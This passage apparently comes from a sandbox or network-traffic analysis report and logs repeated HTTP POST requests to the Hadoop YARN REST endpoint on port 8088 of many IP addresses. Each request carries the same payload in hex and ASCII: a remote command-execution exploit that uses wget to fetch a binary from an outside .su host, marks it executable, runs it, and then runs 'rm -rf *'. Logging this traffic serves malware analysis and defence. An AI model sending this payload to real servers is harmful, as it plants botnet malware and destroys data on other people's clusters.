20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 22.172.178.76:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 22.172.178.76:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 49.179.51.163:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 254.30.40.98:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 219.253.93.123:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 219.253.93.123:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 219.253.93.123:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 219.253.93.123:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 186.99.201.69:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 186.99.201.69:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 186.99.201.69:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 186.99.201.69:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 186.99.201.69:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 109.161.191.41:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 109.161.191.41:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 62.49.198.58:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 77.210.59.160:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 140.203.230.141:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 140.203.230.141:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 79 61 72 6e 67 61 79 66 61 67 3b 20 72 6d 20 2d 72 66 20 2a 22 7d 7d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 79 70 65 22 3a 22 59 41 52 4e 22 7d Data Ascii: {"application-id":"","application-name":"exploit","am-container-spec":{"commands":{"command":"cd /tmp; wget http://pen.gorillafirewall.su/x86_32.nn; chmod 777 x86_32.nn; ./x86_32.nn yarngayfag; rm -rf *"}},"application-type":"YARN"}
                Source: global trafficHTTP traffic detected: POST /ws/v1/cluster/apps HTTP/1.1Host: 140.203.230.141:8088Content-Type: application/jsonContent-Length: 232Data Raw: 7b 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 69 64 22 3a 22 22 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 6d 65 22 3a 22 65 78 70 6c 6f 69 74 22 2c 22 61 6d 2d 63 6f 6e 74 61 69 6e 65 72 2d 73 70 65 63 22 3a 7b 22 63 6f 6d 6d 61 6e 64 73 22 3a 7b 22 63 6f 6d 6d 61 6e 64 22 3a 22 63 64 20 2f 74 6d 70 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 70 65 6e 2e 67 6f 72 69 6c 6c 61 66 69 72 65 77 61 6c 6c 2e 73 75 2f 78 38 36 5f 33 32 2e 6e 6e 3b 20 63 68 6d 6f 64 20 37 37 37 20 78 38 36 5f 33 32 2e 6e 6e 3b 20 2e 2f 78 38 36 5f 33 32 2e 6e 6e 20 